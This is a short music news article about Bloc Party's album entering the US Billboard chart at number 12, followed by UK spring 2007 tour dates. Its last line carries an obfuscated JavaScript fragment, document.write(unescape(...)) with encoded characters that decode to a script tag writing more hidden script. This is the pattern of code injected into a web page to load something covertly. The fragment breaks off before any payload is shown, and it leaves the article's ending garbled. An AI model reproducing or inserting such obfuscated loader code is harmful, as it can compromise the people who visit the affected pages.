Bloc Party appear to be on the brink of breaking the American market, after their new album entered the US chart inside the Top 20.
"A Weekend In The City" dropped at number 12 in the Billboard chart, over 100 places higher than the peak of the band's debut "A Silent Alarm" two years ago.
The LP, which landed at number two in the UK Top 40, has achieved considerable success in other territories, also going in at number two in Japan, Australia and Ireland.
As reported yesterday, Bloc Party have announced details of a spring tour, to accompany the LP and forthcoming single "I Still Remember".
The shows, which include two gigs at Brixton Academy in London, will feature Mahogany, Biffy Clyro and The Maccabees as support.
The shows are as follows:
April 2007
14 Glasgow Academy
15 Wolverhampton Civic Hall
16 Plymouth Pavilions
18 Blackpool Empress Ballroom
19+20 London Brixton Academy
"I Still Remember" is released on April 9.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
